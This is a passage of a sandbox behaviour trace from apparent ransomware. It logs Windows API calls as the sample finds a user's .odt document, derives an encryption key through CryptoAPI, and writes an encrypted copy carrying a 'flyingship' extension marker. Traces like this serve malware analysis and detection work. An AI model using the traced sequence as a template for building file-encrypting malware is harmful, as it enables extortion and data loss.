hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0172.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0172.942] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0172.942] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0172.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0172.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.943] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0172.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0172.943] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a766f40, ftCreationTime.dwHighDateTime=0x1d5ddc1, ftLastAccessTime.dwLowDateTime=0x40a7d2d0, ftLastAccessTime.dwHighDateTime=0x1d5db4e, ftLastWriteTime.dwLowDateTime=0x40a7d2d0, ftLastWriteTime.dwHighDateTime=0x1d5db4e, nFileSizeHigh=0x0, nFileSizeLow=0x9ec8, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="SSq5T5u.odt", cAlternateFileName="")) returned 0x90add8 [0172.944] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0172.944] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a766f40, ftCreationTime.dwHighDateTime=0x1d5ddc1, ftLastAccessTime.dwLowDateTime=0x40a7d2d0, ftLastAccessTime.dwHighDateTime=0x1d5db4e, ftLastWriteTime.dwLowDateTime=0x40a7d2d0, ftLastWriteTime.dwHighDateTime=0x1d5db4e, nFileSizeHigh=0x0, nFileSizeLow=0x9ec8, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="SSq5T5u.odt", cAlternateFileName="")) returned 0x90add8 [0172.944] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0172.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KwBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wBYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BYebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebiNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="biNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iNhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NhHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hHcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HcjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cjLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jLML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ML\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SSq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sq5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q5T5u.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.946] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0172.946] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0172.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0172.947] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a766f40, ftCreationTime.dwHighDateTime=0x1d5ddc1, ftLastAccessTime.dwLowDateTime=0x40a7d2d0, ftLastAccessTime.dwHighDateTime=0x1d5db4e, ftLastWriteTime.dwLowDateTime=0x40a7d2d0, ftLastWriteTime.dwHighDateTime=0x1d5db4e, nFileSizeHigh=0x0, nFileSizeLow=0x9ec8, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="SSq5T5u.odt", cAlternateFileName="")) returned 0x90af58 [0172.947] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0172.947] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0172.947] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.947] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0172.947] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0172.947] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.947] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0172.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0172.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0172.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0172.948] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0172.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0172.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0172.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0172.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0172.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0172.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0172.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0172.949] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0172.949] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0172.949] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0172.949] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0172.949] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.949] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0172.949] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.949] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0172.949] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.950] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0172.950] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0172.950] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.967] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.967] CryptHashData (hHash=0x90ae18, pbData=0x8debf0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0172.967] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.967] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0172.967] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.967] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0172.967] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.967] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.967] CryptDestroyHash (hHash=0x90ae18) returned 1 [0172.968] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\ssq5t5u.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.968] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.968] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0172.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0172.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0172.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0172.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0172.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0172.968] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0172.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0172.968] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0172.969] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.969] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml")) returned 0x10 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0172.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.969] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.flyingship.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\ssq5t5u.flyingship.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0173.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0173.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 